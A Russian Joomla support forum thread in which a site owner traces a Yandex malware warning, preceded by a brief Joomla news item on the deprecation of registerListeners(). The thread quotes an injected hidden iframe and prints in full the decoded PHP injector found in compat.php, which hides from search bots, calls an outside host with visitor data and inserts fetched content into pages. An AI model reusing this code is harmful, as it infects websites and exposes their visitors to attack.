Новости Joomla

Метод registerListeners() в CMSPlugin в плагинах планируется удалить в Joomla 7.0

Метод registerListeners() в CMSPlugin в плагинах  планируется удалить в Joomla 7.0

👩‍💻 Метод registerListeners() в CMSPlugin в плагинах планируется удалить в Joomla 7.0.Этот метод регистрирует устаревшие слушатели событий в диспетчере, имитируя работу плагинов Joomla! 3.x и ниже для Joomla 4+. По умолчанию этот метод ищет все общедоступные методы, название которых начинается с on. Он регистрирует лямбда-функции (замыкания), которые пытаются преобразовать аргументы отправленного события в аргументы вызова метода и вызвать ваш метод on<Что-то>. Результат передаётся обратно событию в его аргумент result.Теперь этот слой совместимости с устаревшей Joomla 3 помечен к удалению в Joomla 7.0, которая должна выйти осенью 2027 года. Это означает, что те уникальные расширения от Joomla 2.5 / Joomla 3, которые ещё работали на Joomla 4-6 скорее всего окончательно перестанут работать на Joomla 7. Предполагается, что активные разработчики планомерно и постепенно избавляются от технического долга и обновляют свои расширения. @joomlafeed#joomla #разработка #php

0 Пользователей и 1 Гость просматривают эту тему.
  • 22 Ответов
  • 5444 Просмотров
*

nelix

  • Захожу иногда
  • 206
  • 24 / 0
Вредоносный код
« : 29.12.2010, 18:35:39 »
Всем привет.
Вчера в панели Яндекс вебмастера появилось сообщение о том, что на сайте вредоносный код. Пока в списке зараженных станиц только одна страница. В результатах поиска сайт выводится с пометкой «Этот сайт может угрожать безопасности вашего компьютера».
Сам я в исходном коде ничего подозрительного не нашел. Все скрипты которые есть это реклама  и 2 сервиса статистики. Яндекс Метрика и Google Аналитикс. Больше никаких скриптов нет. Онлайн проверка доктор веба тоже пишет, что вирусов нет.
Ни в исходном коде ни в файле шаблона ничего подозрительного перечисленного тут не нашел.
Единственное, что у знакомой аваст ругается и пишет что ан сайте вирус, мой почему то молчит.



Где искать это гзип? или можно вообще все, что есть на сайте удалить?
« Последнее редактирование: 29.12.2010, 18:49:38 от nelix »
*

ART-DELI

  • Давно я тут
  • 801
  • 75 / 9
  • Не успеешь ты – сделают другие.
Re: Вредоносный код
« Ответ #1 : 29.12.2010, 18:37:54 »
Ну для начала прогоните свой сайт каким то сервисом на наличие внешних запросов. Похоже он у вас с какого то адреса тянет фрейм. Вот и проверьте к каким адресам он отправляет запрос.
*

SDKiller

  • Живу я здесь
  • 2705
  • 329 / 5
  • ...ergo sum
Re: Вредоносный код
« Ответ #2 : 29.12.2010, 18:41:10 »
это реклама 




Не Вы первый, кто пострадал от низкокачественной рекламы, которая подгружается в i-frame
*

nelix

  • Захожу иногда
  • 206
  • 24 / 0
Re: Вредоносный код
« Ответ #3 : 29.12.2010, 18:50:31 »
Ну для начала прогоните свой сайт каким то сервисом на наличие внешних запросов. Похоже он у вас с какого то адреса тянет фрейм. Вот и проверьте к каким адресам он отправляет запрос.

Каким например?

Не Вы первый, кто пострадал от низкокачественной рекламы, которая подгружается в i-frame

Нет не реклама.  У меня реклама без i-frame. Я же написал, что в коде ничего такого вообще нет.
*

ART-DELI

  • Давно я тут
  • 801
  • 75 / 9
  • Не успеешь ты – сделают другие.
Re: Вредоносный код
« Ответ #4 : 29.12.2010, 18:53:52 »
Каким например?
site-perf.com
*

nelix

  • Захожу иногда
  • 206
  • 24 / 0
Re: Вредоносный код
« Ответ #5 : 29.12.2010, 19:10:00 »
site-perf.com
А там что-то дополнительно надо выбирать? Нажал я Go выдал он мне результаты зугрузки. Там где список URL только урлы с картинками и 2 скрпита на сервисы статистики.
*

ART-DELI

  • Давно я тут
  • 801
  • 75 / 9
  • Не успеешь ты – сделают другие.
Re: Вредоносный код
« Ответ #6 : 29.12.2010, 21:19:18 »
Ну как это, вы же говорили даже что у вас реклама есть. и что? она у вас не тянется с каких то других ресурсов:?
*

nelix

  • Захожу иногда
  • 206
  • 24 / 0
Re: Вредоносный код
« Ответ #7 : 29.12.2010, 21:32:38 »
Ну как это, вы же говорили даже что у вас реклама есть. и что? она у вас не тянется с каких то других ресурсов:?
Реклама есть, но этот сервис видит всего 2 скрипта. Могу скрин сделать или адрес сайта в личку кинуть.
*

ART-DELI

  • Давно я тут
  • 801
  • 75 / 9
  • Не успеешь ты – сделают другие.
Re: Вредоносный код
« Ответ #8 : 29.12.2010, 23:15:51 »
Вот адрес сайта в личку было бы именно оно.
*

nelix

  • Захожу иногда
  • 206
  • 24 / 0
Re: Вредоносный код
« Ответ #9 : 04.02.2011, 14:24:56 »
Товарищи! Я снова с этой же проблемой. Яндекс уже 3 раз пишет, что у меня на сайте вирус. После второго раза, я вновь написал им письмо и получил ответ.

В настоящий момент с Вашим сайтом все в порядке, пометка в выдаче снялась, проверьте, пожалуйста. Задержка была вызвана техническими проблемами с нашей стороны, приносим свои искренние извинения за доставленные неудобства.

Вредоносный код, обнаруженный на сайте, был прописан после элемента <div id="header-wrapper">, и выглядел следующим образом:

[iframe src="h**p://abrabr.co.cc/f/jldtjuc.php?n=24234" width="0" height="0" frameborder="0"></iframe][div id="header"]

Звездочки в ссылке вставлены во избежание случайного перехода, скобки в тегах script изменены во избежание случайного срабатывания кода.


Но самое интерсное, что я на сайте ничего не менял. Только вот после этого раза начал реагировать мой антивирус, но не всегда. Около 5 раз такое было. Антивирус на сайт конечно же не пускал. Поэтому исходный код я глянуть не мог. Но после обновления страницы все было ок. Вирус прям какой-то динамический.

Вот скрин антивируса
*

busik

  • Захожу иногда
  • 186
  • 7 / 0
Re: Вредоносный код
« Ответ #10 : 04.02.2011, 15:31:19 »
А дату модификации сайтов проверяли? Какие файлы модифицировались непосредственно перед обнаружением сигнала?
*

nelix

  • Захожу иногда
  • 206
  • 24 / 0
Re: Вредоносный код
« Ответ #11 : 04.02.2011, 18:49:48 »
А дату модификации сайтов проверяли? Какие файлы модифицировались непосредственно перед обнаружением сигнала?
Нет не проверял. И теперь уже не проверю. Я удалял сайт и заливал бэкап. Но не помогло.
*

busik

  • Захожу иногда
  • 186
  • 7 / 0
Re: Вредоносный код
« Ответ #12 : 04.02.2011, 20:37:37 »
Нет не проверял. И теперь уже не проверю. Я удалял сайт и заливал бэкап. Но не помогло.

Так не бывает. Если залит "чистый" бекап, то почему сохраняется собщение о вредоносном коде?
*

nelix

  • Захожу иногда
  • 206
  • 24 / 0
Re: Вредоносный код
« Ответ #13 : 04.02.2011, 22:31:15 »
Так не бывает. Если залит "чистый" бекап, то почему сохраняется собщение о вредоносном коде?
Он видимо не чистый. Первый раз то было еще 29 декабря. Потом перепроверка яндекса, показала, что все ок. Я думал вируса не было. Просто глюк. А потом опять. Я же говорю скрипт не всегда в коде. И антивирус ругался всего раз 5.
*

busik

  • Захожу иногда
  • 186
  • 7 / 0
Re: Вредоносный код
« Ответ #14 : 05.02.2011, 17:42:21 »
Он видимо не чистый. Первый раз то было еще 29 декабря. Потом перепроверка яндекса, показала, что все ок. Я думал вируса не было. Просто глюк. А потом опять. Я же говорю скрипт не всегда в коде. И антивирус ругался всего раз 5.

Ну как это скрипт не в коде! Ну что то же его вызывает, даже если он извне
*

nelix

  • Захожу иногда
  • 206
  • 24 / 0
Re: Вредоносный код
« Ответ #15 : 06.02.2011, 01:32:20 »
Ну как это скрипт не в коде! Ну что то же его вызывает, даже если он извне
Я имею ввиду, если смотреть исходный код сайта, то скрипт там не всегда.
*

nelix

  • Захожу иногда
  • 206
  • 24 / 0
Re: Вредоносный код
« Ответ #16 : 06.02.2011, 13:32:13 »
Нашел. В libraries\joomla\utilities\compat\compat.php был base64_decode внутри которого еще один base64_decode.
*

busik

  • Захожу иногда
  • 186
  • 7 / 0
Re: Вредоносный код
« Ответ #17 : 06.02.2011, 14:22:28 »
Нашел. В libraries\joomla\utilities\compat\compat.php был base64_decode внутри которого еще один base64_decode.

Ради интереса - то, что внутри, раскодировать не пытались? Когда у меня было подобное - я раскодировал, оказался какой то рассыльщик, толко чего и куда - я так и не разобрался

К слову, у меня предпоследнее массовое заражение файлов было около года назад, я замучался тогда чистить. Особенно неприятно было то, что это случилось, когда я был в командировке - восстанавливал с какого то ужасного местного вай фая, который все время рвался. Так что часть восстановил копированием из бекапа, часть вычистил руками. Вроде бы все вычистил окончательно И вдруг через год (!), на этой неделе, я чищу уже совсем другой вирус, который вписывал скрипт вниз файла, и обнаруживаю, что в маленьких галереях картинок, которые я вставлял в новости (мамбот их строил) есть папка (в каждой галерее),  в которой лежат кешированные превьшки  картинок. Их там очень много, в каждой. Помню, что я заглянул в эти папки год назад, увидел кучу кешей, и решил что тут ничего быть не может. А оказалось, что в каждой в конце есть файл index.php, в котрой преспокойно сидит до сих пор тот самый base64_decode ... и т.д. - все тело скрипта.
*

nelix

  • Захожу иногда
  • 206
  • 24 / 0
Re: Вредоносный код
« Ответ #18 : 06.02.2011, 19:42:01 »
Раскодировал конечно. Только долго не мог понять, что это пока не увидел второй base64_decode в котором был закодирован адрес сайта.
Если интересно то вот
Код
if(function_exists("ob_start") && !function_exists("lbw_ecjs") && !function_exists("pat_pinp") && !function_exists("zxkc_lhw") && !isset($GLOBALS["aa"]) && @strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),"googlebot") === false && @strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),"msnbot") === false && @strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),"yahoo") === false && !isset($_COOKIE["vrve"]) ){$GLOBALS["aa"] = 1;setcookie("vrve", 1, time()+3600*24*2, "/"); function pat_pinp($gzencode_arg) { $x = @ord(@substr($gzencode_arg, 3, 1)); $shift = 10; $shift2 = 0; if( $x&4 ) { $unpack=@unpack("v", substr($gzencode_arg, 10, 2)); $unpack=$unpack[1]; $shift+= 2 + $unpack; } if( $x&8 ) { $shift = @strpos($gzencode_arg, chr(0), $shift) + 1; } if( $x&16 ) { $shift = @strpos($gzencode_arg, chr(0), $shift) + 1; } if( $x&2 ) { $shift += 2; } $gzip = @gzinflate(@substr($gzencode_arg, $shift)); if($gzip === FALSE) { $gzip = $gzencode_arg; } return $gzip; } function zxkc_lhw( $url ) { /* if (function_exists("curl_init")) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 5); $curl_result = curl_exec ($ch); curl_close($ch); if ($curl_result) return $curl_result; } if (@ini_get("allow_url_fopen")) { $file_result = @file_get_contents($url); if ($file_result) return $file_result; } */ $url_info = parse_url($url); $query = "GET $url HTTP/1.0\r\n"; $query .= "Host: " . $url_info["host"] . "\r\n"; $query .= "Connection: Close\r\n\r\n"; $fp = @fsockopen($url_info["host"], 80, $errno, $errstr, 5); if (!$fp) return false; @fputs($fp, $query); @socket_set_timeout ($fp, 5, 0); $s_retcode = @substr (@fgets ($fp, 4096), 9, 3); if ($s_retcode{0} <> "2") {return FALSE;} while (! @feof ($fp)) { if ("\r\n" === @fgets ($fp, 4096)) {break;} } $socket_result = ""; while (! @feof ($fp)) { $socket_result .= @fgets ($fp, 4096); } @fclose($fp); if ($socket_result) return $socket_result; } function lbw_ecjs($pts){return preg_replace("#(.*||[^<>]*]*>|)#is", "$1" . ujq_pkpu, pat_pinp($pts), 1);}$ujq_pkpu=zxkc_lhw(base64_decode("aHR0cDovL2djb3VudGVyLmNuL2luZm8ucGhw"). "?i=" . $_SERVER["REMOTE_ADDR"] . "&s=" . $_SERVER["HTTP_HOST"]);@preg_match("#(.*)#", $ujq_pkpu, $matches);$ujq_pkpu= isset($matches[1])? $matches[1] : "";if ($ujq_pkpu) {define("ujq_pkpu",$ujq_pkpu); ob_start("lbw_ecjs");}}
*

busik

  • Захожу иногда
  • 186
  • 7 / 0
Re: Вредоносный код
« Ответ #19 : 06.02.2011, 20:50:08 »
Раскодировал конечно. Только долго не мог понять, что это пока не увидел второй base64_decode в котором был закодирован адрес сайта.
Если интересно то вот
Код
if(function_exists("ob_start") && !function_exists("lbw_ecjs") && !function_exists("pat_pinp") && !function_exists("zxkc_lhw") && !isset($GLOBALS["aa"]) && @strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),"googlebot") === false && @strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),"msnbot") === false && @strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),"yahoo") === false && !isset($_COOKIE["vrve"]) ){$GLOBALS["aa"] = 1;setcookie("vrve", 1, time()+3600*24*2, "/"); function pat_pinp($gzencode_arg) { $x = @ord(@substr($gzencode_arg, 3, 1)); $shift = 10; $shift2 = 0; if( $x&4 ) { $unpack=@unpack("v", substr($gzencode_arg, 10, 2)); $unpack=$unpack[1]; $shift+= 2 + $unpack; } if( $x&8 ) { $shift = @strpos($gzencode_arg, chr(0), $shift) + 1; } if( $x&16 ) { $shift = @strpos($gzencode_arg, chr(0), $shift) + 1; } if( $x&2 ) { $shift += 2; } $gzip = @gzinflate(@substr($gzencode_arg, $shift)); if($gzip === FALSE) { $gzip = $gzencode_arg; } return $gzip; } function zxkc_lhw( $url ) { /* if (function_exists("curl_init")) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 5); $curl_result = curl_exec ($ch); curl_close($ch); if ($curl_result) return $curl_result; } if (@ini_get("allow_url_fopen")) { $file_result = @file_get_contents($url); if ($file_result) return $file_result; } */ $url_info = parse_url($url); $query = "GET $url HTTP/1.0\r\n"; $query .= "Host: " . $url_info["host"] . "\r\n"; $query .= "Connection: Close\r\n\r\n"; $fp = @fsockopen($url_info["host"], 80, $errno, $errstr, 5); if (!$fp) return false; @fputs($fp, $query); @socket_set_timeout ($fp, 5, 0); $s_retcode = @substr (@fgets ($fp, 4096), 9, 3); if ($s_retcode{0} <> "2") {return FALSE;} while (! @feof ($fp)) { if ("\r\n" === @fgets ($fp, 4096)) {break;} } $socket_result = ""; while (! @feof ($fp)) { $socket_result .= @fgets ($fp, 4096); } @fclose($fp); if ($socket_result) return $socket_result; } function lbw_ecjs($pts){return preg_replace("#(.*||[^<>]*]*>|)#is", "$1" . ujq_pkpu, pat_pinp($pts), 1);}$ujq_pkpu=zxkc_lhw(base64_decode("aHR0cDovL2djb3VudGVyLmNuL2luZm8ucGhw"). "?i=" . $_SERVER["REMOTE_ADDR"] . "&s=" . $_SERVER["HTTP_HOST"]);@preg_match("#(.*)#", $ujq_pkpu, $matches);$ujq_pkpu= isset($matches[1])? $matches[1] : "";if ($ujq_pkpu) {define("ujq_pkpu",$ujq_pkpu); ob_start("lbw_ecjs");}}

Все равно че то сходу не понял
*

nelix

  • Захожу иногда
  • 206
  • 24 / 0
Re: Вредоносный код
« Ответ #20 : 07.02.2011, 10:27:00 »
Да я сам не понял, что он делает. По закодированному адресу сайта понял, что это вирус. Ну а позже догадался с другого сайта сравнить файл)
*

busik

  • Захожу иногда
  • 186
  • 7 / 0
Re: Вредоносный код
« Ответ #21 : 07.02.2011, 12:32:27 »
Отдал вирус спецу нашему, пусть копается
*

nelix

  • Захожу иногда
  • 206
  • 24 / 0
Re: Вредоносный код
« Ответ #22 : 07.02.2011, 20:49:19 »
Отдал вирус спецу нашему, пусть копается
Хорошо. Напишите тогда, как он разберется. Самому интересно.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

В файле index.php постоянно появляется вредоносный код

Автор Armal

Ответов: 29
Просмотров: 4477
Последний ответ 08.05.2021, 16:16:32
от gartes
Вредоносный код в url после якоря #

Автор dm-krv

Ответов: 7
Просмотров: 1925
Последний ответ 10.07.2018, 14:12:29
от dm-krv
TIMEWEB> Обнаружен вредоносный код

Автор nikinfo

Ответов: 6
Просмотров: 3210
Последний ответ 16.12.2015, 12:38:46
от flyingspook
Сайт взломан, не могу найти вредоносный код

Автор Larisa

Ответов: 15
Просмотров: 2866
Последний ответ 06.04.2015, 18:51:20
от SeBun
Где искать вредоносный код

Автор sea_dream

Ответов: 6
Просмотров: 2149
Последний ответ 24.09.2014, 21:22:25
от Rival